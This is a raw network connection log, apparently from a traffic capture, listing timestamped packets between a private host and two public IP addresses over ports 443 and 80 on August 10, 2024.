Aug 10, 2024 16:12:25.258593082 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.258656979 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:25.258656979 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:25.258663893 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.258951902 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.258964062 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.258982897 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:25.258985996 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.259063959 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:25.259063959 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:25.259407997 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.259422064 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.259490967 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:25.259495974 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.259644032 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:25.260318041 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.260329962 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.260390043 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:25.260394096 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.260446072 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:25.260446072 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:25.265027046 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.265039921 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.265104055 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:25.265108109 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.265189886 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.265203953 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.265305996 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:25.265306950 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:25.265311003 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.265367985 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:25.265862942 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.265876055 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.265944004 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:25.265948057 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.266087055 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:25.278244972 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.278325081 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.278565884 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.278587103 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.278601885 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.278611898 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.278615952 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.278620005 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.278630018 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.278637886 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.278642893 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.278651953 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.278657913 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.278669119 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.278670073 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.278682947 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.278683901 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.278697014 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.278697968 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.278704882 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.278717995 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.278724909 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.278732061 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.278743029 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.278747082 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.278749943 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.278760910 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.278764963 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.278774977 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.278779030 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.278789997 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.278794050 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.278804064 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.278808117 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.278820038 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.278825998 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.278839111 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.278850079 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.278852940 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.278863907 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.278888941 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.278908014 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.279314995 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.279329062 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.279361010 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.279361963 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.279370070 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.279400110 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.279459953 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.279474974 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.279489040 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.279503107 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.279503107 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.279514074 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.279529095 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.279540062 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.279552937 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.279567957 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.279576063 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.279582977 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.279597044 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.279598951 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.279611111 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.279625893 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.279675961 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.279690981 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.279705048 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.279719114 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.279737949 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.279776096 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.279789925 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.279804945 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.279819965 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.279829979 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.279838085 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.279850960 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.279853106 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.279867887 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.279891014 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.279925108 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.279937983 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.279962063 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.279964924 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.279977083 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.279990911 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.280014992 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.280029058 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.280031919 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.280046940 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.280066013 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.280066967 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.280077934 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.280100107 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.280107975 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.284476995 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.284518957 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.284527063 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.284534931 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.284548998 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.284564018 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.284579992 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.284600973 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.284620047 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.284626961 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.284641981 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.284656048 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.284666061 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.284671068 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.284674883 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.284684896 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.284689903 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.284699917 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.284712076 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.284713984 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.284719944 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.284730911 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.284737110 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.284753084 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.284761906 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.284773111 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.284773111 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.284816027 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.285164118 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.285177946 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.285192966 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.285207033 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.285218000 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.285224915 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.285232067 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.285233021 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.285247087 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.285249949 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.285263062 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.285264015 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.285280943 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.285300970 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.289951086 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.289964914 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.289979935 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.289995909 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.290008068 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.290018082 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.290023088 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.290031910 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.290045023 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.290057898 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.290071964 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.290080070 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.290101051 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.290134907 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.290149927 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.290163040 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.290178061 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.290189981 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.290193081 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.290199995 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.290206909 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.290220976 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.290224075 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.290235996 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.290247917 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.290262938 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.290273905 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.290278912 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.290292025 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.290313005 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.290313005 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.290323019 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.290333986 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.290340900 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.290357113 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.290370941 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.290384054 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.290407896 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.290468931 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.290482998 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.290497065 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.290528059 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.290538073 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.290611029 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.290633917 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.290647984 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.290662050 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.290668011 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.290678978 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.290682077 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.290693045 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.290708065 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.290709972 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.290721893 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.290724993 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.290736914 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.290750027 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.290921926 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.308089972 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.308190107 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.308371067 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.308383942 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.308404922 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.308419943 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.308434010 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.308449984 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.308449984 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.308464050 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.308478117 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.308505058 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.308505058 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.308505058 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.308516979 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.308530092 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.308540106 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.308543921 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.308558941 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.308567047 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.308573961 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.308585882 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.308588028 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.308603048 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.308610916 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.308617115 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.308638096 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.308644056 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.308659077 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.308671951 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.308686018 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.308700085 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.308713913 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.308727026 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.308743000 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.308746099 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.308746099 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.308746099 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.308746099 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.308757067 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.308785915 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.308792114 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.308792114 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.308799982 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.308824062 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.308837891 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.308845997 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.308852911 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.308865070 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.308950901 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.308964968 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.308979034 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.308990955 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.308990955 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.308994055 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.309010029 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.309022903 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.309029102 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.309029102 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.309196949 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.309196949 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.309226036 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.309253931 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.309278011 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.309293032 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.309293032 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.309293032 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.309307098 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.309322119 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.309335947 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.309350014 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.309353113 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.309353113 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.309353113 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.309365988 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.309380054 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.309398890 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.309398890 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.309405088 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.309421062 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.309423923 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.309436083 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.309449911 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.309463978 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.309484005 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.309493065 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.309493065 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.309493065 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.309499025 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.309514046 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.309537888 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.309537888 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.309561014 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.309575081 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.309590101 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.309612036 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.309628010 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.309633970 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.309633970 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.309633970 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.309633970 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.309640884 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.309657097 CEST	80	49740	147.45.44.104	192.168.2.4
